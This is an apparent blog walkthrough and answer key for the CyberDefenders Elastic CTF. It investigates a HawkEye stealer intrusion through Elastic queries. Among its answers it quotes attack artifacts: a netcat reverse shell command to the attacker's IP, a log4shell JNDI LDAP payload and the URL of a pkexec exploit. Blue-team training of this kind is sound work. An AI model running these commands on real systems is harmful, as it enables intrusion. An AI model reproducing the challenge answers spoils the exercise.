CyberDefenders - Elastic CTF
Intro
CyberDefenders.org, hosted a challenging hawkeye stealer challenge. You the challenger/IR team have to investigate an incident using ELastic Search, and answer questions about the infected victim and the attack narative.
For those that don’t know about CyberDefenders they host a platform deticated to training BlueTeam skills: Incident response, digital forensics, security analysts, etc). If you are used to VulnHub and Hack-the-box, these services are typically geared more towards redteaming and penetration testing. This is where CyberDefenders stand out!
Walkthrough
1) Who downloads the malicious file which has a double extension?
- search: file.name:..* and rule.name:Downloads
ahmed
2) What is the hostname he was using?
Answer:
DESKTOP-Q1SL9P2
3) What is the name of the malicious file?
Answer:
Acount_details.pdf.exe
4) What is the attacker’s IP address?
Hint:
- time: feb 2 15:30+
- search: related.user:ahmed
- filter: destination.ip:exists
Answer:
192.168.1.10
5) Another user with high privilege runs the same malicious file. What is the username?
- remove related.user from previous search
Answer:
cybery
6) The attacker was able to upload a DLL file of size 8704. What is the file name?
- search: related.user:cybery and event.type:”creation”
Answer:
mCblHDgWP.dll
7) What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?
- search: process.pid :10716
- log: winlogbeat
Answer:
rundll32.exe
8) The previous process was able to access a registry. What is the full path of the registry
Hint:
- log: logs-*
- search: process.name:”rundll32.exe”
- time: feb 2 15:00+
Answer:
HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
9) PowerShell process with pid 8836 changed a file in the system. What was that filename?
- search: event.type:”change” and process.name:powershell.exe
- log: logs-*
Answer:
ModuleAnalysisCache
10) PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?
- search: event.type:”creation” and process.name:powershell.exe and process.pid: 11676
- log: log-*
Answer:
__PSScriptPolicyTest_bymwxuft.3b5.ps1
11) What is the machine’s IP address that is in the same LAN as a windows machine?
This one threw up sharding issues for me???
Eventually looking around the time of the attack, and the address rangfe 192.168.10.1/24, we found out answer…
Answer:
192.168.10.30
12) The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?
- search: event.action:”ssh_login”
- log: logs-*
- time: feb 2 15:30+
Answer:
salem
13) After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?
- search: user.name:”salem” and wget
- log: logs-*
Answer:
https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py
14) After The attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?
tricky one, but if we search on the pids 3003/3004 from previous answer…
- search: process.name:”pkexec” and process.pid:3003
- log: logs-*
Answer:
3a4ad518e9e404a6bad3d39dfebaf2f6
15) Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?
Answer:
bash -i
16) What is the hostname which alert signal.rule.name: “Netcat Network Activity”?
Hint:
- switch to Security -> Rules
Answer:
CentOS
17) What is the username who ran netcat?
Answer:
solr
18) What is the parent process name of netcat?
Answer:
java
19) If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?
Answer:
nc -e /bin/bash 192.168.1.10 9999
20) From the previous three questions, you may remember a famous java vulnerability. What is it?
Answer:
log4shell
21) What is the entire log file path of the “solr” application?
Hint:
- log: logs-*
- search: file.name:solr*
Answer:
/var/solr/logs/solr.log
22) What is the path that is vulnerable to log4j?
Hint:
- log: filebeat
- search: log.file.path:”/var/solr/logs/solr.log”
Answer:
/admin/cores
23) What is the GET request parameter used to deliver log4j payload?
Answer:
foo
24) What is the JNDI payload that is connected to the LDAP port?
Answer:
{foo=${jndi:ldap://192.168.1.10:1389/Exploit}}
Share on: